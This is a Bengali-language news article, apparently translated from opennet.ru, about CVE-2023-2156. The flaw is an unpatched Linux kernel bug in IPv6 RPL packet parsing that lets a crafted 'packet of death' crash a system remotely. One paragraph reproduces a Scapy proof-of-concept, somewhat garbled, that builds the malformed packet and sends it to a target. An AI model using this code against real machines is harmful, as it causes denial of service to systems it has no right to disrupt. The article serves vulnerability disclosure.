0-দিনের Linux IPv6 স্ট্যাক দুর্বলতা যা দূরবর্তী কার্নেল ক্র্যাশের অনুমতি দেয়

লিনাক্স কার্নেলে একটি আনপ্যাচড (0-দিন) দুর্বলতা (CVE-2023-2156) সম্পর্কে তথ্য প্রকাশ করা হয়েছে যা বিশেষভাবে তৈরি করা IPv6 প্যাকেট (প্যাকেট-অফ-ডেথ) পাঠানোর মাধ্যমে সিস্টেমটিকে থামানোর অনুমতি দেয়। সমস্যাটি তখনই দেখা দেয় যখন RPL প্রোটোকলের জন্য সমর্থন (লো-পাওয়ার এবং ক্ষতিকারক নেটওয়ার্কগুলির জন্য রাউটিং প্রোটোকল) সক্ষম করা থাকে, যা ডিস্ট্রিবিউশনে ডিফল্টরূপে অক্ষম থাকে এবং উচ্চ প্যাকেট লস সহ ওয়্যারলেস নেটওয়ার্কগুলিতে পরিচালিত এমবেডেড ডিভাইসগুলিতে প্রধানত ব্যবহৃত হয়৷

RPL প্রোটোকল পার্সিং কোডে বাহ্যিক ডেটার ভুল পরিচালনার কারণে দুর্বলতা সৃষ্টি হয়, যা একটি দাবী ব্যর্থতার দিকে পরিচালিত করে এবং কার্নেল একটি আতঙ্কিত অবস্থায় চলে যায়। IPv6 RPL প্যাকেট হেডারকে k_buff (সকেট বাফার) কাঠামোতে পার্স করার ফলে প্রাপ্ত ডেটা স্থাপন করার সময়, যদি CmprI ক্ষেত্রটি 15 এ সেট করা হয়, Segleft ক্ষেত্রটি 1 এ সেট করা হয়, এবং CmprE 0 এ সেট করা হয়, 48- বাইট ঠিকানা ভেক্টর 528 বাইটে আনপ্যাক করা হয়েছে এবং এমন একটি পরিস্থিতি যেখানে বাফারের জন্য পর্যাপ্ত মেমরি বরাদ্দ নেই। এই ক্ষেত্রে, কাঠামোর মধ্যে ডেটা পুশ করার জন্য ব্যবহৃত skb_push ফাংশনটি ডেটা এবং বাফারের অসামঞ্জস্যপূর্ণ আকারের জন্য একটি পরীক্ষা চালায়, বাফারটিকে ওভাররাইট করা প্রতিরোধ করতে একটি আতঙ্কিত অবস্থা তৈরি করে।

উদাহরণ ব্যবহার করুন: # আমরা scapy.all import * import socket থেকে প্যাকেট তৈরি করতে Scapy ব্যবহার করব # আপনার LAN ইন্টারফেস থেকে IPv6 ব্যবহার করুন DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # প্যাকেট পাঠাতে আমরা সকেট ব্যবহার করব sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # প্যাকেট তৈরি করুন # প্রকার = 3 এটিকে একটি RPL প্যাকেট করে # ঠিকানায় 3টি ঠিকানা রয়েছে, কিন্তু যেহেতু CmprI 15, # প্রথম দুটি ঠিকানার প্রতিটি অক্টেট একটি সংকুচিত ঠিকানা হিসাবে বিবেচনা করা হয় # Segleft = 1 পরিবর্ধনকে ট্রিগার করতে # lastentry = 0xf0 CmprI 15 এবং CmprE 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type:"a=3,"[e=8) সেট করে :", "a7::", "a6::"], segleft=1, lastentry=0xf0) # এই খারাপ প্যাকেট পাঠান sockfd.sendto(bytes(p), (DST_ADDR, 0))

এটা লক্ষণীয় যে কার্নেল ডেভেলপারদের 2022 সালের জানুয়ারিতে দুর্বলতার বিষয়ে অবহিত করা হয়েছিল এবং গত 15 মাসে তারা সেপ্টেম্বর 2022, অক্টোবর 2022 এবং এপ্রিল 2023-এ প্যাচগুলি প্রকাশ করে তিনবার সমস্যাটি সমাধান করার চেষ্টা করেছিল, কিন্তু প্রতিবারই সংশোধন করা হয়নি যথেষ্ট এবং দুর্বলতা পুনরুত্পাদন করতে সক্ষম ছিল। শেষ পর্যন্ত, ZDI প্রকল্প, যা দুর্বলতা দূর করার জন্য কাজকে সমন্বিত করেছিল, কার্নেলে একটি কার্যকরী প্যাচ উপস্থিত হওয়ার জন্য অপেক্ষা না করে, দুর্বলতা সম্পর্কে বিস্তারিত তথ্য প্রকাশ করার সিদ্ধান্ত নিয়েছে।

এইভাবে, দুর্বলতা এখনও অপ্রতিরোধ্য। 6.4-rc2 কার্নেলে অন্তর্ভুক্ত প্যাচ অন্তর্ভুক্ত করা কার্যকর নয়। ব্যবহারকারীদের তাদের সিস্টেমে RPL প্রোটোকল ব্যবহার করা হচ্ছে না তা যাচাই করার পরামর্শ দেওয়া হচ্ছে, যা sysctl -a | grep -i rpl_seg_enabled

উত্স: opennet.ru